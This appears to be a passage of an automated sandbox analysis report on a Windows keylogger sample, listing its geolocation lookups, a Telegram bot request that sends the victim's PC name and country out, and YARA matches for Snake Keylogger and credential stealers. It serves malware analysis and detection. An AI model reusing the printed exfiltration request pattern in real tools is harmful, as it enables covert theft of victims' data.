                                                                                                                6192.168.2.949695104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-03-07 22:22:35 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:35 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147537
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTWPO2CoePJ2QoltdOGrsTIHQhkWVHAstPxKVfDy0QBvcKykRrtXiBiq0%2FIO4ZQAn3R3DJTtSQPOzP9pZ62W9EYygddvQO5DFjKbRrVH1hplxNmHtJW28yX31602yPTl0BYvFgDa"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7e1008717073-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=41222&min_rtt=40239&rtt_var=13052&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=64554&cwnd=97&unsent_bytes=0&cid=78a4b624a866e4b5&ts=639&x=0"
                                                                                                                2025-03-07 22:22:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.949697104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:38 UTC853INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:38 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147539
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj8VooYW4oityYEejfTWfdsXednB66y6HewykbyqgGRzQcHfaReVP7g3MRMdFvi%2B9jZGhWE%2FN8FGp4UJhcPAUjlKiPmNfPjWXPzKQ3foGKi6EVffCpYXi6cRto0GqaWH7NTYUyvX"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7e22681d7073-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=50410&min_rtt=42364&rtt_var=19052&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=67971&cwnd=97&unsent_bytes=0&cid=296984819ba6c951&ts=561&x=0"
                                                                                                                2025-03-07 22:22:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.949699104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:41 UTC862INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:41 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147542
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65EzhfO26%2BpklOuanMD7aCp%2BqXJriIu%2Bc08rHL2r0XLoqg1YL5KSkW1tLjOCfDhd3LtT3y%2FWKUbV0pDCVEa3%2Bpc8WVAOWJ0yum9%2FzbLlpXndZeet191MRkf5E1V6fn6Z145curfz"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7e34ff65026c-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=39459&min_rtt=37775&rtt_var=13574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=63804&cwnd=180&unsent_bytes=0&cid=8d9940aee0fb0a8e&ts=641&x=0"
                                                                                                                2025-03-07 22:22:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.949700149.154.167.2204437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:43 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:44 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 07 Mar 2025 22:22:44 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-03-07 22:22:44 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:17:22:11
                                                                                                                Start date:07/03/2025
                                                                                                                Path:C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                                                                                                                Imagebase:0xe70000
                                                                                                                File size:773'120 bytes
                                                                                                                MD5 hash:414A4CCE996061C8F67088E96B9E5745
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:17:22:12
                                                                                                                Start date:07/03/2025
                                                                                                                Path:C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                                                                                                                Imagebase:0x6b0000
                                                                                                                File size:773'120 bytes
                                                                                                                MD5 hash:414A4CCE996061C8F67088E96B9E5745
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >